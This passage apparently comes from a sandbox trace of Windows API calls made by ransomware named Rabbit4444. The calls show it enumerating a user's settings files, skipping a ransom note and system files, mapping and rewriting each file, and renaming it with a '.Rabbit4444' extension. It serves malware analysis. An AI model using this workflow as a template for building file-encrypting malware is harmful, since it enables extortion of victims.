(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{11135ae0-7372-4f85-8d1b-93d6efbe5a99}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{11135ae0-7372-4f85-8d1b-93d6efbe5a99}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.383] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e38db6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x44e38db6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", cAlternateFileName="CLB1DB~1.SET")) returned 1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2=".") returned 1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="..") returned 1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="windows") returned -1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="boot") returned 1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.383] lstrcmpiW (lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.383] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms" | out: lpString1="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms") returned="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms" [0058.383] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.383] lstrlenW (lpString="Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms") returned 64 [0058.383] lstrlenW (lpString="Rabbit4444") returned 10 [0058.383] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.383] lstrlenW (lpString=".dll") returned 4 [0058.383] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.383] lstrlenW (lpString=".lnk") returned 4 [0058.383] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.384] lstrlenW (lpString=".ini") returned 4 [0058.384] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.384] lstrlenW (lpString=".sys") returned 4 [0058.384] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.384] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{11e71674-7556-4e27-8d59-03b2fa846204}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.384] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.384] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14969474501) returned 1 [0058.384] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1047) returned 1 [0058.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0058.384] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0058.385] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0058.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.387] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14969735640) returned 1 [0058.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0058.387] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.387] CloseHandle (hObject=0x298) returned 1 [0058.387] CloseHandle (hObject=0x278) returned 1 [0058.387] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms.Rabbit4444") returned 192 [0058.387] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{11e71674-7556-4e27-8d59-03b2fa846204}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{11e71674-7556-4e27-8d59-03b2fa846204}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.388] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f6a097, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x44f6a097, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", cAlternateFileName="CLC76D~1.SET")) returned 1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2=".") returned 1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="..") returned 1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="windows") returned -1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="boot") returned 1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.388] lstrcmpiW (lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.388] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms" | out: lpString1="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms") returned="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms" [0058.388] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.388] lstrlenW (lpString="Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms") returned 64 [0058.388] lstrlenW (lpString="Rabbit4444") returned 10 [0058.388] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.388] lstrlenW (lpString=".dll") returned 4 [0058.388] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.388] lstrlenW (lpString=".lnk") returned 4 [0058.388] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.388] lstrlenW (lpString=".ini") returned 4 [0058.389] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.389] lstrlenW (lpString=".sys") returned 4 [0058.389] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.389] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.389] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.389] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14969966338) returned 1 [0058.389] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=830) returned 1 [0058.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0058.389] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0058.390] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0058.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.393] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14970404261) returned 1 [0058.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0058.393] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.394] CloseHandle (hObject=0x298) returned 1 [0058.394] CloseHandle (hObject=0x278) returned 1 [0058.394] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms.Rabbit4444") returned 192 [0058.394] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.394] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45349d8f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x45349d8f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", cAlternateFileName="CL4E6D~1.SET")) returned 1 [0058.394] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.394] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2=".") returned 1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="..") returned 1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="windows") returned -1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="boot") returned 1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.395] lstrcmpiW (lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.395] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms" | out: lpString1="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms") returned="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms" [0058.395] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.395] lstrlenW (lpString="Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms") returned 64 [0058.395] lstrlenW (lpString="Rabbit4444") returned 10 [0058.395] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.395] lstrlenW (lpString=".dll") returned 4 [0058.395] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.395] lstrlenW (lpString=".lnk") returned 4 [0058.395] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.395] lstrlenW (lpString=".ini") returned 4 [0058.395] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.395] lstrlenW (lpString=".sys") returned 4 [0058.395] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.395] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{12bbbd91-8e16-4c3f-9715-16e5c8299244}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.396] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.396] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14970641040) returned 1 [0058.396] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1164) returned 1 [0058.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.396] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0058.397] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0058.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.398] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14970924184) returned 1 [0058.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.399] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.399] CloseHandle (hObject=0x298) returned 1 [0058.399] CloseHandle (hObject=0x278) returned 1 [0058.399] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms.Rabbit4444") returned 192 [0058.399] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{12bbbd91-8e16-4c3f-9715-16e5c8299244}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{12bbbd91-8e16-4c3f-9715-16e5c8299244}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.400] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4561ea3a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4561ea3a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", cAlternateFileName="CL9DFE~1.SET")) returned 1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2=".") returned 1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="..") returned 1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="windows") returned -1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="boot") returned 1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.400] lstrcmpiW (lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.400] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms" | out: lpString1="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms") returned="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms" [0058.400] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.401] lstrlenW (lpString="Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms") returned 64 [0058.401] lstrlenW 